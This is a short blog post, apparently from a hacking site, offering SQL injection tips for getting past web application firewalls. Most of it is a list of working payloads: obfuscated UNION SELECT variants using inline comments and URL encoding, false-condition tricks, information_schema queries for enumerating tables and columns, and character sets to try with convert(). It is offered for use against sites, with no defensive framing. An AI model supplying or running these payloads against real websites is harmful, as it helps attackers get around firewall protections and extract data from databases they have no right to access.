Pages

Thursday, May 16, 2013

WAF Bypass Sql Injection Tips

This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If u dont know sql injection you can learn it HERE
Order By Not Working?
You can simply bypass it by using group by instead of order by
Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) 

/*!50000union*/+/*!50000select*/ 

UNIunionON+SELselectECT 

+union+distinct+select+ 

+union+distinctROW+select+ 

union+/*!select*/+1,2,3 

union/**/select/**/1,2,3 

uni%20union%20/*!select*/%20 

/**//*!union*//**//*!select*//**/ 

union%23aa%0Aselect 

/**/union/*!50000select*/ 

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ 

id=1+’UnI”On’+'SeL”ECT’ <-MySQL only 

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
after id no. like id=1 +/*!and*/+1=0

+div+0 

Having+1=0 

+AND+1=0 

+/*!and*/+1=0 

and(1)=(0)
False The Url::

=-id=-1 union all select 

id=null union all select 

id=1+and+false+union+all+select 

id=9999 union all select
Order Bypassing do like this

/*!table_name*/ 

+from /*!information_schema*/./*!tables*/ where table_schema=database() 

unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name))) 

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)
used with order::

convert()using ascii) 

unhex(hex())
If ascii dont work you could try:


ujis 

ucs2 

tis620 

swe7 

sjis 

macroman 

macce 

latin7 

latin5 

latin2 

koi8u 

koi8r 

keybcs2 

hp8 

geostd8 

gbk 

gb2132 

armscii8 

ascii 

binary 

cp1250 

big5 

cp1251 

cp1256 

cp1257 

cp850 

cp852 

cp866 

cp932 

dec8 

euckr 

latin1 

utf8
source :  http://hack2play.blogspot.com 

No comments:

Post a Comment